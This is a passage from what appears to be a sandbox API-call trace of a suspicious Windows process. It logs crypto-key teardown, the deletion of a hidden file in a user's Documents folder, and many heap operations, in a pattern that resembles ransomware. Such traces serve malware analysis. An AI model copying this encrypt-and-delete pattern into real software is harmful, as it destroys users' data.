lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0084.614] CryptDestroyKey (hKey=0x41ac500) returned 1 [0084.614] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.614] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.679] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0084.680] CryptReleaseContext (hProv=0x41a43f8, dwFlags=0x0) returned 1 [0084.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.680] FreeLibrary (hLibModule=0x756e0000) returned 1 [0084.680] CloseHandle (hObject=0x298) returned 1 [0084.680] CloseHandle (hObject=0x258) returned 1 [0084.682] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x37 [0084.682] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico")) returned 0x2 [0084.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0084.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0084.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0084.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.683] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="folder.ico", cAlternateFileName="")) returned 0x41ac500 [0084.683] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico")) returned 1 [0084.684] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0084.684] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0084.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0084.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431df50 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0084.685] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0084.685] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0084.685] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0084.685] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0084.685] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0084.686] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0084.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0084.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0084.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0084.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0084.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0084.687] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0084.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0084.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0084.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.688] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a) returned 0x43595f0 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.690] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0084.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0084.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.691] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.691] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.691] RtlAllocateHeap (HeapHandle=0x1780000, 